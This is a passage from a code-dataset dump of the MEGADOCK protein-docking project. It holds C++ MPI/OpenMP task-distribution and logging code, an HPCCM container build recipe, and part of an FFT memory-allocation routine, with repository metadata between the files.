1;\n _Largest_chunk_size = LONG_MAX;\n _Out_option = 0;\n //_Ntry = 0; // Number retrying limit\n _Worker_life = 3;\t\t\t// Worker life (default=3)\n \n // for MPIDP options\n for( int i = 1 ; i < argc ; i++ ) {\n if( !strncmp(argv[i],\"-tb\",3) ) {\n _Table_file = argv[++i];\n logout << \"Table file : -tb \" << _Table_file << endl;\n }\n else if( !strncmp(argv[i],\"-ch\",3) ) {\n _Smallest_chunk_size = atoi(argv[++i]);\n if (_Smallest_chunk_size <= 0) {\n cerr << \"[ERROR] Smallest chunk size must be a positive integer!\" << endl;\n exit(1);\n }\n logout << \"Smallest chunk size : -ch \" << _Smallest_chunk_size << endl;\n }\n else if( !strncmp(argv[i],\"-lc\",3) ) {\n _Largest_chunk_size = atoi(argv[++i]);\n if (_Largest_chunk_size <= 0) {\n cerr << \"[ERROR] Largest chunk size must be a positive integer!\" << endl;\n exit(1);\n }\n logout << \"Largest chunk size : -ic \" << _Largest_chunk_size << endl;\n }\n else if( !strncmp(argv[i],\"-ot\",3) ) {\n _Out_option = atoi(argv[++i]);\n logout << \"Output option : -ot \" << _Out_option << endl;\n }\n else if( !strncmp(argv[i],\"-wl\",3) ) {\n _Worker_life = atoi(argv[++i]);\n logout << \"Worker life : -wl \" << _Worker_life << endl;\n }\n else if( !strncmp(argv[i],\"-pg\",3) ) {\n logout << \"Program name : -pg \" << argv[++i] << endl;\n }\n else if( 
!strncmp(argv[i],\"-lg\",3) ) {\n logout << \"Log file : -lg \" << argv[++i] << endl;\n }\n }\n if (_Smallest_chunk_size > _Largest_chunk_size) {\n cerr << \"[ERROR] Largest chunk size cannot be smaller than smallest chunk size!\" << endl;\n exit(1);\n }\n \n // for other(application's) options\n int oflag = 0;\n for( int i = 1 ; i < argc ; i++ ) {\n if( !strncmp(argv[i],\"-tb\",3) ||\n !strncmp(argv[i],\"-ch\",3) ||\n !strncmp(argv[i],\"-lc\",3) ||\n !strncmp(argv[i],\"-ot\",3) ||\n !strncmp(argv[i],\"-rt\",3) ||\n !strncmp(argv[i],\"-wl\",3) ||\n !strncmp(argv[i],\"-pg\",3) ||\n !strncmp(argv[i],\"-lg\",3) ) {\n i++;\n }\n else {\n if( oflag == 0 ) {\n logout << \"Other options :\";\n oflag = 1;\n }\n logout << \" \" << argv[i];\n }\n }\n \n if( oflag == 1 ) {\n logout << endl;\n }\n logout << endl;\n \n // open JOB list file\n ifstream Input(_Table_file.c_str(),ios::in);\n if( !Input ) {\n cerr << \"[ERROR] Table file [\" << _Table_file\n << \"] was not opened!!\" << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n exit(1);\n }\n\n _Num_pair = 0;\n\n // read JOB list file (calculate csize)\n while(1) {\n if( !getline(Input,table) ) break;\n \n table = erase_space(table,7);\n \n if( !strncmp(table.c_str(),\"TITLE=\",6) ||\n !strncmp(table.c_str(),\"Title=\",6) ||\n !strncmp(table.c_str(),\"title=\",6) ) {\n _Title = table.substr(6);\n logout << \"TITLE=\" << _Title << endl;\n }\n else if( !strncmp(table.c_str(),\"PARAM=\",6) ||\n !strncmp(table.c_str(),\"Param=\",6) ||\n !strncmp(table.c_str(),\"param=\",6) ) {\n _Param = table.substr(6);\n _Psize = _Param.size() + 1;\n logout << \"PARAM=\" << _Param << endl;\n }\n else {\n csize = (table.size() > csize) ? table.size() : csize;\n _Num_pair++;\n }\n }\n \n logout << endl;\n Input.close();\n _Csize = csize + 1;\n \n int line_index = 0;\n _Table_list.reserve((long) _Csize * _Num_pair);\n \n ifstream Input2(_Table_file.c_str(),ios::in);\n if( !Input2 ) {\n cerr << \"[ERROR] Table file [\" << _Table_file\n << \"] was not opened!!\" << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n exit(1);\n }\n\n // read JOB list file (read lines)\n while(1) {\n if( !getline(Input2,table) ) break;\n \n table = erase_space(table,7);\n \n if( strncmp(table.c_str(),\"TITLE=\",6) &&\n strncmp(table.c_str(),\"Title=\",6) &&\n strncmp(table.c_str(),\"title=\",6) &&\n strncmp(table.c_str(),\"PARAM=\",6) &&\n strncmp(table.c_str(),\"Param=\",6) &&\n strncmp(table.c_str(),\"param=\",6) )\n {\n copy(table.begin(), table.begin() + _Csize, back_inserter(_Table_list));\n _Table_list.back() = 0;\n }\n }\n Input2.close();\n\n for( int i = 0 ; i < _Csize; i++ ) {\n if( _Table_list[i] == '\\t' ) {\n ndata ++;\n }\n }\n \n // According to _Name data\n _Ndata = ndata + 1;\n \n //ntry = _Ntry;\n \n return;\n}\n\n//============================================================================//\nstring Mpidp::erase_space(const string &s0,const int ip)\n// Deletion of spaces\n//============================================================================//\n{\n int \tn;\n string\ts1;\n \n s1 = s0;\n \n while(1) {\n n = s1.find(\" \");\n \n if( n == std::string::npos ) {\n break;\n }\n else if( n < ip ) {\n s1.erase(n,1);\n }\n else {\n break;\n }\n }\n \n return s1;\n}\n\n//============================================================================//\nint Mpidp::master0(int argc, char *argv[], const int &nproc)\n// master process for NO retry\n//============================================================================//\n{\n int\twid;\t\t\t\t// Worker id\n int\t\tnproc2;\n \n#ifdef _OPENMP\n 
#pragma omp parallel\n {\n nproc2 = omp_get_num_threads();\n if(omp_get_thread_num() == 0) {\n cout << \"# Using OpenMP parallelization: \" << nproc2 << \" threads.\" << endl;\n }\n }\n //printf(\"#OpenMP version %d\\n\", _OPENMP);\n#else\n nproc2 = 1;\n#endif //#ifdef _OPENMP\n\n char\t*param = new char[_Psize];\t// for PARAM data\n \n strcpy(param,_Param.c_str());\n \n // The calculation condition is sent to workers. \n for( int i = 1 ; i < nproc ; i++ ) {\n MPI_Send(&_Psize,1,MPI_INT,i,100,MPI_COMM_WORLD);\n MPI_Send(param,_Psize,MPI_CHAR,i,200,MPI_COMM_WORLD);\n MPI_Send(&_Csize,1,MPI_INT,i,300,MPI_COMM_WORLD);\n MPI_Send(&_Ndata,1,MPI_INT,i,400,MPI_COMM_WORLD);\n MPI_Send(&_Out_option,1,MPI_INT,i,420,MPI_COMM_WORLD);\n }\n\n\n /*\n const long rem = _Num_pair % nproc;\n const long quo = _Num_pair / nproc;\n _Tlist_size = quo * _Csize;\n int begin_index = 0;\n vector<MPI_Request> reqs(nproc - 1);\n vector<MPI_Status> stats(nproc - 1);\n for (int i = 0; i < nproc - 1; i++) {\n const long tlist_size = _Tlist_size + ((i < rem) ? _Csize : 0);\n MPI_Send(&tlist_size, 1, MPI_LONG, i + 1, 430, MPI_COMM_WORLD);\n MPI_Isend(_Table_list.data() + begin_index + _Tlist_size , tlist_size, MPI_CHAR, i + 1, 450, MPI_COMM_WORLD, &reqs[i]);\n begin_index += tlist_size;\n }\n\n\n MPI_Waitall(nproc - 1, &reqs[0], &stats[0]);\n\n _Table_list.resize(_Tlist_size);\n _Table_list.shrink_to_fit();\n */\n\n // Correction of a bug\n int arglen = max(_Csize,_Psize);\n for( int i = 0 ; i < argc ; i++ ) {\n if( strlen(argv[i]) >= arglen ) {\n arglen = strlen(argv[i]) + 1;\n }\n }\n // Bug fix\n int nwargv = argc + _Ndata*2;\n for( int i = 1 ; i < _Psize-2 ; i++ ) {\n if( param[i] == ' ' ) nwargv++;\n }\n\n _App = new Application(nproc2);\n _App->initialize();\n\n#pragma omp parallel\n {\n int myid2 = omp_get_thread_num();\n if (myid2 == 0)\n master_thread(nproc);\n else\n worker_thread(nwargv, arglen, argc, argv, MASTER_PROCESS_ID, myid2);\n }\n delete [] param;\n delete _App;\n\n return 0;\n}\n\n//============================================================================//\nvoid Mpidp::worker(int &myid,char *hostname,int argc,char *argv[])\n// worker process for function call\n//============================================================================//\n{\n int\t\tnproc2;\n \n#ifdef _OPENMP\n #pragma omp parallel\n {\n nproc2 = omp_get_num_threads();\n if(omp_get_thread_num() == 0) {\n cout << \"# Using OpenMP parallelization: \" << nproc2 << \" threads.\" << endl;\n }\n }\n //printf(\"#OpenMP version %d\\n\", _OPENMP);\n#else\n nproc2 = 1;\n#endif //#ifdef _OPENMP\n \n MPI_Recv(&_Psize,1,MPI_INT,MASTER_PROCESS_ID,100,MPI_COMM_WORLD,&_Status);\n char *param = new char[_Psize];\n MPI_Recv(param,_Psize,MPI_CHAR,MASTER_THREAD_ID,200,MPI_COMM_WORLD,&_Status);\n _Param = param;\n \n if( !strncmp(param,\"MPIDP\",5) ) {\n cerr << \"[ERROR] [PARAM=] was not found in table file!!\" << endl;\n exit(1);\n }\n \n MPI_Recv(&_Csize,1,MPI_INT,MASTER_PROCESS_ID,300,MPI_COMM_WORLD,&_Status);\n MPI_Recv(&_Ndata,1,MPI_INT,MASTER_PROCESS_ID,400,MPI_COMM_WORLD,&_Status);\n MPI_Recv(&_Out_option,1,MPI_INT,MASTER_PROCESS_ID,420,MPI_COMM_WORLD,&_Status);\n \n // Correction of a bug\n int arglen = max(_Csize,_Psize);\n for( int i = 0 ; i < argc ; i++ ) {\n if( strlen(argv[i]) >= arglen ) {\n arglen = strlen(argv[i]) + 1;\n }\n }\n // Bug fix\n int nwargv = argc + _Ndata*2;\n for( int i = 1 ; i < _Psize-2 ; i++ ) {\n if( param[i] == ' ' ) nwargv++;\n }\n\n /*\n MPI_Recv(&_Tlist_size, 1, MPI_LONG, MASTER_PROCESS_ID, 430, MPI_COMM_WORLD, 
&_Status);\n _Table_list.resize(_Tlist_size);\n MPI_Recv((void*)_Table_list.data(), _Tlist_size, MPI_CHAR, MASTER_PROCESS_ID, 450, MPI_COMM_WORLD, &_Status);\n */\n _App = new Application(nproc2);\n _App->initialize();\n\n#pragma omp parallel\n {\n int myid2 = omp_get_thread_num();\n worker_thread(nwargv, arglen, argc, argv, myid, myid2);\n }\n \n delete [] param;\n delete _App;\n \n return;\n}\n\n//============================================================================//\nvoid Mpidp::master_thread(const int nproc)\n//============================================================================//\n{\n int countdown = nproc - 1;\n bool end_flag = false;\n\n while (countdown > 0) {\n int child_id;\n MPI_Recv(&child_id, 1, MPI_INT, MPI_ANY_SOURCE, 500, MPI_COMM_WORLD, &_Status); // receive a request from a child process\n\n#pragma omp critical (distribute0)\n {\n if (!has_next_task() && !get_end_flag()) {\n end_flag_on();\n }\n if (get_end_flag()) {\n long send_size = 1;\n MPI_Send(&send_size, 1, MPI_LONG, child_id, 600, MPI_COMM_WORLD); // send 1\n char end_char = '\\0';\n MPI_Send(&end_char, 1, MPI_CHAR, child_id, 700, MPI_COMM_WORLD); // send 0 (end of file message)\n countdown--;\n } else {\n const long table_list_size = _Table_list.size() / _Csize; \n const long chunk_size = min(_Largest_chunk_size, max(_Smallest_chunk_size, table_list_size / nproc));\n long send_size = min(chunk_size * _Csize, (long) _Table_list.size());\n MPI_Send(&send_size, 1, MPI_LONG, child_id, 600, MPI_COMM_WORLD); // send number of tasks to send\n MPI_Send(_Table_list.data() + _Table_list.size() - send_size, send_size, MPI_CHAR, child_id, 700, MPI_COMM_WORLD); // send tasks\n _Table_list.resize(_Table_list.size() - send_size);\n _Table_list.shrink_to_fit();\n }\n }\n }\n}\n\n//============================================================================//\nvoid Mpidp::worker_thread(const int nwargv, const int arglen, const int argc, char *argv[], const int myid, const int myid2)\n//============================================================================//\n{\n struct timeval et3, et4;\n int\t\twargc;\t\t// # of application command line parameters\n char **wargv;\n\n#pragma omp critical (alloc)\n {\n wargv = new char*[nwargv];\n for( int i = 0 ; i < nwargv ; i++ ) {\n wargv[i] = new char[arglen];\n }\n }\n int argc2 = argument(argc,argv,wargv); // # of mpidp comand line parameters\n\n gettimeofday(&et3,NULL);\n\n while(1) {\n\n#pragma omp critical (distribute0)\n {\n if (!has_next_task() && !get_end_flag()) {\n if (myid == 0) {\n end_flag_on();\n } else {\n request_tasks(myid);\n }\n }\n if (!get_end_flag()) {\n char ctable[_Csize];\n strncpy(ctable, _Table_list.data() + _Table_list.size() - _Csize, _Csize);\n\n wargc = for_worker(ctable,argc2,wargv);\n _Table_list.resize(_Table_list.size() - _Csize);\n _Table_list.shrink_to_fit();\n }\n }\n if (get_end_flag()) break;\n\n try {\n throw _App->application(wargc,wargv,myid2);\t// application's main function\n }\n catch(int e) {\n if (e) {\n cerr << \"_App->application was not successfully finished\" << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n }\n }\n catch(char *e) {\n cerr << \"[ERROR] [application] exception : \" << e << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n }\n\n }\n delete [] wargv;\n\n gettimeofday(&et4,NULL);\n const float total_time = (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n printf(\"\\nTotal time ([proc / thread] %5d / %2d) = %8.2f sec.\\n\", myid, myid2, 
total_time);\n}\n\n\n//============================================================================//\nint Mpidp::argument(int argc,char *argv[],char **wargv)\n// Procedure of options for function call version\n//============================================================================//\n{\n    int ic = 0;\n    \n    for( int i = 0 ; i < argc ; i++ ) {\n        if( !strncmp(argv[i],\"-tb\",3) ||\n            !strncmp(argv[i],\"-ch\",3) ||\n            !strncmp(argv[i],\"-lc\",3) ||\n            !strncmp(argv[i],\"-ot\",3) ||\n            !strncmp(argv[i],\"-rt\",3) ||\n            !strncmp(argv[i],\"-wl\",3) ||\n            !strncmp(argv[i],\"-lg\",3) ) {\n            i++;\n        }\n        else {\n            strcpy(wargv[ic++],argv[i]);\n        }\n    }\n    \n    return ic;\n}\n\n//============================================================================//\nint Mpidp::argument(int argc,char *argv[],string &main_argv)\n// Procedure of options for system call version\n//============================================================================//\n{\n    int iflag = 1;\n    \n    for( int i = 1 ; i < argc ; i++ ) {\n        if( !strncmp(argv[i],\"-pg\",3) ) {\n            main_argv = argv[++i];\n            iflag = 0;\n        }\n        else if( !strncmp(argv[i],\"-tb\",3) ||\n                 !strncmp(argv[i],\"-ch\",3) ||\n                 !strncmp(argv[i],\"-lc\",3) ||\n                 !strncmp(argv[i],\"-ot\",3) ||\n                 !strncmp(argv[i],\"-rt\",3) ||\n                 !strncmp(argv[i],\"-wl\",3) ||\n                 !strncmp(argv[i],\"-lg\",3) ) {\n            i++;\n        }\n        else {\n            main_argv += ' ';\n            main_argv += argv[i];\n        }\n    }\n    \n    return iflag;\n}\n\n//============================================================================//\nint Mpidp::for_worker(char *ctable,int argc2,char **wargv)\n// Preparation using function call version by workers\n//============================================================================//\n{\n    string\tposition;\n    string\ttstock;\n    string\tsparam = _Param;\n    char\t\ttag[5], *elem;\n    \n    //strcpy(_Name,strtok(ctable,\"\\t\"));\n    position = \"$1\";\n    tstock = strtok(ctable,\"\\t\");\n    sparam = replace_pattern(sparam,position,tstock);\n    \n    for( int i = 1 ; i < _Ndata ; i++ ) {\n        sprintf(tag,\"$%d\",i+1);\n        position = tag;\n        tstock = strtok(NULL,\"\\t\");\n        \n        // character is replaced\n        sparam = replace_pattern(sparam,position,tstock);\n    }\n    \n    char param[sparam.size()+1];\n    //char *param = new char[sparam.size()+1];\n    strcpy(param,sparam.c_str());\n    strcpy(wargv[argc2++],strtok(param,\" \"));\n    \n    while( (elem = strtok(NULL,\" \")) ) {\n        strcpy(wargv[argc2++],elem);\n    }\n    \n    return argc2;\n}\n\n\n//============================================================================//\nstring Mpidp::replace_pattern(const string &pattern,const string &position,\n                              const string &option)\n// the pattern of a character is replaced \n//============================================================================//\n{\n    string\tcommand;\n    int\tpos_before = 0;\n    int\tpos = 0;\n    int\tlen = position.size();\n    \n    while( (pos = pattern.find(position, pos)) != std::string::npos) {\n        command.append(pattern, pos_before, pos - pos_before);\n        command.append(option);\n        pos += len;\n        pos_before = pos;\n    }\n    \n    command.append(pattern, pos_before, pattern.size() - pos_before);\n    \n    return command;\n}\n\n//============================================================================//\nvoid Mpidp::request_tasks(const int &myid)\n//============================================================================//\n{\n    MPI_Send(&myid, 1, MPI_INT, 0, 500, MPI_COMM_WORLD); // request num_of_tasks_per_request tasks\n    long task_msg_size;\n    MPI_Recv(&task_msg_size, 1, MPI_LONG, 0, 600, MPI_COMM_WORLD, &_Status); // receive task_msg_size\n    
_Table_list.resize(task_msg_size);\n MPI_Recv(_Table_list.data(), task_msg_size, MPI_CHAR, 0, 700, MPI_COMM_WORLD, &_Status); // receive tasks\n if (_Table_list[0] == 0) { // if received end of file message\n end_flag_on();\n }\n}\n" }, { "alpha_fraction": 0.40282002091407776, "alphanum_fraction": 0.4285319447517395, "avg_line_length": 32.49074172973633, "blob_id": "86a4c3b926cb85d93e2a9dc69166793e4a0b3106", "content_id": "495195e0fc35420a0ed351c4d5f27fb48f73ac99", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3617, "license_type": "permissive", "max_line_length": 272, "num_lines": 108, "path": "/megadock-scfa20/exec_logger.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ExecLogger\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"exec_logger.h\"\n\n//============================================================================//\nvoid ExecLogger::initialize()\n//============================================================================//\n{\n _cputime->initialize();\n\t\n mb = 0.0;\n\n#ifdef CUFFT\n devmem_free = 0;\n devmem_total = 0;\n devmem_use = 0;\n#endif\n\n _RLOut_file = \"\";\n _Num_fft_flag = 0;\n rec_filename = \"\";\n lig_filename = \"\";\n rec_max_size = 0.0;\n lig_max_size = 0.0;\n rec_voxel_size = 0.0;\n lig_voxel_size = 0.0;\n rec_num_grid = 0;\n lig_num_grid = 0;\n grid_width = 0.0;\n return;\n}\n\n//============================================================================//\nvoid ExecLogger::output(const int myid2)\n//============================================================================//\n{\n printf(\"# Output file = %s\\n\", _RLOut_file.c_str());\n if (!_Num_fft_flag) {\n printf(\"\\nReceptor = %s\\n\"\n \"Receptor max size = %f\\n\"\n \"Required voxel size = %f\\n\"\n \"Number of grid = %d\\n\"\n \"FFT N = %d\\n\"\n \"\\nLigand = %s\\n\"\n \"Ligand max size = %f\\n\"\n \"Required voxel size = %f\\n\"\n \"Number of grid = %d\\n\"\n \"FFT N = %d\\n\",\n rec_filename.c_str(),\n rec_max_size,\n rec_voxel_size,\n rec_num_grid,\n rec_num_grid * 2,\n lig_filename.c_str(),\n lig_max_size,\n lig_voxel_size,\n lig_num_grid,\n lig_num_grid * 2\n );\n\n } else {\n cout << \"\\nReceptor max size = \" << rec_max_size << endl;\n cout << \"Required voxel size = \" << rec_voxel_size << endl;\n cout << \"\\n(Receptor)\\n\";\n cout << \"Number of grid = \" << rec_num_grid << endl;\n cout << \"FFT N = \" << rec_num_grid*2 << endl;\n cout << \"Grid size = \" << grid_width << endl;\n cout << \"\\nLigand max size = \" << lig_max_size << endl;\n cout << \"Required voxel size = \" << lig_voxel_size << endl;\n cout << \"\\n(Ligand)\\n\";\n cout << \"Number of grid = \" << lig_num_grid << endl;\n cout << \"FFT N = \" << lig_num_grid*2 << endl;\n cout << \"Grid size = \" << grid_width << endl;\n }\n if ( mb < 1000 )\n printf(\"Memory requirement (/node) = %.1Lf MB\\n\",mb); // approximate value\n else \n printf(\"Memory requirement (/node) = %.1Lf GB\\n\",mb/1024); // approximate value\n\n#ifdef CUFFT\n printf(\"# GPU Memory : Use %3.1f MB (%4.1f%%), Free %3.1f MB (%4.1f%%), Total %3.1f 
MB\\n\",(float)devmem_use/1024.0/1024.0,(float)(100*devmem_use/devmem_total), (float)devmem_free/1024.0/1024.0, (float)(100*devmem_free/devmem_total), (float)devmem_total/1024.0/1024.0);\n#endif\n\n printf(\n \"\\n---------- Start docking calculations\\n\"\n \"\\nLigand = %s\\n\"\n \"Target receptors:\\n\"\n \" %s\\n\\n\", lig_filename.c_str(), rec_filename.c_str()\n );\n //if( !((ang+1)%nc) || _parameter->tem_flag1==1 ) {\n // printf(\" >Ligand rotation = %5d / %5d (%2d)\\n\",ang+1,_parameter->_Num_rot_angles,myid2);\n //}\n printf(\" Thread ID = %2d\\n\\n\",myid2);\n\n _cputime->output();\n}\n" }, { "alpha_fraction": 0.6063114404678345, "alphanum_fraction": 0.6326953172683716, "avg_line_length": 20.954545974731445, "blob_id": "92f4f4cc7f8d39245f1d331545ccab044e51fe05", "content_id": "06e28d83d82f46e44e6ae2c0259cd50fe8bc9fe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1933, "license_type": "permissive", "max_line_length": 85, "num_lines": 88, "path": "/megadock_hpccm.py", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "\"\"\"\nHPC Base image\n\nContents:\n CentOS 7 (default)\n CUDA version 10.0 (default)\n Mellanox OFED version 4.6-1.0.1.1 ('ofed=True')\n Intel OPA driver/library (upstream, 'opa=True')\n GNU compilers (upstream)\n FFTW version 3.3.8 (default)\n OpenMPI version 3.1.3 (default)\n\"\"\"\n# pylint: disable=invalid-name, undefined-variable, used-before-assignment\n\n# userargs\nbase_image = USERARG.get('base', 'nvidia/cuda:10.0-devel-centos7')\nompi_version = USERARG.get('ompi', '3.1.3')\nfftw_version = USERARG.get('fftw', '3.3.8')\nofed_flag = USERARG.get('ofed', False)\nopa_flag = USERARG.get('opa', False)\n\n######\n# Devel stage\n######\n\n# base image\ndevel_image = base_image\n\nStage0.name = 'devel'\n\nStage0 += comment(__doc__, reformat=False)\n\nStage0 += baseimage(image=devel_image, _as='devel')\n\n# OFED\nif ofed_flag:\n Stage0 += mlnx_ofed(version='4.6-1.0.1.1')\n\n# Intel OPA\nif opa_flag:\n Stage0 += packages(\n yum=['numactl-libs', 'hwloc-libs', 'libfabric', 'libibverbs', 'infinipath-psm', \\\n 'opa-basic-tools', 'rdma-core', 'libpsm2', \\\n 'libhfil', 'libibverbs-devel', 'libsysfs-devel']\n )\n\n# MEGADOCK deps\nStage0 += packages(\n yum=['cuda-samples-10-0', 'ssh']\n)\n\n# GNU compilers\ncompiler = gnu()\nStage0 += compiler\n\n# FFTW\nStage0 += fftw(\n version=fftw_version, \n prefix='/usr/local/fftw',\n configure_opts=[\n '--enable-float',\n '--enable-sse2'\n ],\n toolchain=compiler.toolchain\n)\n\nOpenMPI_with_verbs = ofed_flag or opa_flag\n\n# OpenMPI\nStage0 += openmpi(\n version=ompi_version,\n prefix='/usr/local/openmpi',\n cuda=True, \n infiniband=OpenMPI_with_verbs,\n configure_opts=[\n '--enable-mpi-cxx'\n ],\n toolchain=compiler.toolchain\n)\n\n# MEGADOCK\nStage0 += copy(src='./megadock-scfa20', dest='/workspace')\nStage0 += copy(\n src='./Makefile',\n dest='/workspace/Makefile'\n)\n\nStage0 += shell(commands=['cd /workspace', 'make -j$(nproc)'])\n\n" }, { "alpha_fraction": 0.531929612159729, "alphanum_fraction": 0.5557242631912231, "avg_line_length": 38.35194778442383, "blob_id": "be4186771db989d7771d0ca89d659f3bb7ec0e07", "content_id": "7b7b2ae325626cea92d7be55d908cb2eda11084c", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 30301, "license_type": "permissive", "max_line_length": 215, "num_lines": 770, "path": 
"/megadock-scfa20/fft_process_table.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcessTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"fft_process_table.h\"\n\n#define NUM_THREADS 512 //should be power of 2\n\n#ifdef CUFFT\n\n#include \"cuda_kernel.h\"\n\n#endif\n\n//============================================================================//\nvoid FFTProcessTable::alloc_array(const int &num_fft)\n//============================================================================//\n{\n //cout << \"FFT::alloc_array |\" <<num_fft<< endl; cout.flush();\n _Num_fft = num_fft;\n\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int num_sort = _parameter->_Num_sort;\n const int num_angle = _parameter->_Num_rot_angles;\n const int no = _parameter->_Num_output;\n const size_t nproc2 = _parallel->nproc2();\n int num_toprank;\n\n num_toprank = num_angle * num_sort;\n if( no > num_toprank ) num_toprank = no;\n\n alloc_fft();\n\n _Select.resize(num_sort);\n\n _Top.resize(num_toprank);\n\n //---------- memory allocation for _Current_rot_angle_num\n //_Current_rot_angle_num = new int[nproc2];\n\n _exec_logger->record_malloc( sizeof(float)*nf3*2*(1 + nproc2));\n\n //---------- memory allocation for _FFT_rec_r\n _FFT_rec_r = new float[nf3];\n if( !_FFT_rec_r ) {\n cerr << \"[ERROR] Out of memory. Number of listed receptors = (\"\n << nf3 << \") for (_FFT_rec_r) in fft_process.cpp!!\\n\";\n exit(1);\n }\n\n //---------- memory allocation for _FFT_rec_i\n _FFT_rec_i = new float[nf3];\n if( !_FFT_rec_i ) {\n cerr << \"[ERROR] Out of memory. 
Number of listed receptors = (\"\n << nf3 << \") for (_FFT_rec_i) in fft_process.cpp!!\\n\";\n exit(1);\n }\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessTable::alloc_fft()\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n const int na = _ligand->num_atoms();\n\n#ifdef CUFFT\n const int num_sort = _parameter->_Num_sort;\n const int ng1 = _Num_fft / 2;\n const int ng3 = ng1 * ng1 * ng1;\n const int nag = na * ng1;\n //for ligand voxelization on GPU\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n\n CUFFTin_host = new cufftComplex[nf3];\n CUFFTout_host = new cufftComplex[nf3];\n\n _exec_logger->record_malloc( sizeof(cufftComplex)*nf3*2 ); //_in/outBuf\n\n //printf(\" start: %p\\n\",&CUFFTin_host[0].x);\n\n int lenCUFFTin_host = (int)(((long int)&CUFFTin_host[nf3-1].x) - ((long int)&CUFFTin_host[0].x) + sizeof(CUFFTin_host[nf3-1]))/sizeof(CUFFTin_host[nf3-1]);\n if(lenCUFFTin_host !=nf3) printf(\"# discontinuous memory allocation occurs\\n\");\n\n //printf(\" end: %ld\\n\",(long long int)&CUFFTin_host[nf3-1].y - &CUFFTin_host[0].x);\n\n int myid2 = omp_get_thread_num();\n cudaSetDevice(myid2 % num_gpu);\n checkCudaErrors( cudaStreamCreate(&_cuda_stream));\n cufft_result = cufftPlan3d(&cufft_plan, nf1, nf1, nf1, CUFFT_C2C);\n cufftSetStream(cufft_plan, _cuda_stream);\n\n checkCudaErrors( cudaMalloc((void **)&CUFFTin_gpu, sizeof(cufftComplex)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&CUFFTout_gpu, sizeof(cufftComplex)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&_FFT_rec_r_gpu, sizeof(float)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&_FFT_rec_i_gpu, sizeof(float)*nf3) );\n\n checkCudaErrors( cudaMalloc((void **)&grid_r_gpu, sizeof(float)*ng3));\n checkCudaErrors( cudaMalloc((void **)&grid_i_gpu, sizeof(float)*ng3));\n checkCudaErrors( cudaMalloc((void **)&grid_coord_gpu, sizeof(float)*ng1));\n checkCudaErrors( cudaMalloc((void **)&radius_core2_gpu, sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&radius_surf2_gpu, sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&_Charge_gpu, sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&xd_gpu, sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&yd_gpu, sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&zd_gpu, sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&atom_coord_rotated_gpu, sizeof(float)*na*3));\n checkCudaErrors( cudaMalloc((void **)&atom_coord_orig_gpu, sizeof(float)*na*3));\n checkCudaErrors( cudaMalloc((void **)&mole_center_coord_gpu, sizeof(float)*3));\n checkCudaErrors( cudaMalloc((void **)&ligand_rotation_angle_gpu, sizeof(float)*3));\n checkCudaErrors( cudaMalloc((void **)&top_score_gpu, sizeof(float)*nBlocks_nf3*num_sort) );\n checkCudaErrors( cudaMalloc((void **)&top_index_gpu, sizeof(int)*nBlocks_nf3*num_sort) );\n top_score_host = new float[nBlocks_nf3];\n top_index_host = new int[nBlocks_nf3];\n\n _exec_logger->record_malloc( sizeof(float)*nBlocks_nf3 + sizeof(int)*nBlocks_nf3 );\n\n cudaMemGetInfo(&(_exec_logger->devmem_free), &(_exec_logger->devmem_total));\n _exec_logger->devmem_use = _exec_logger->devmem_total - _exec_logger->devmem_free;\n\n#else\n\n _FFTWin = (fftwf_complex*) fftwf_malloc(sizeof(fftwf_complex)*nf3);\n _FFTWout = 
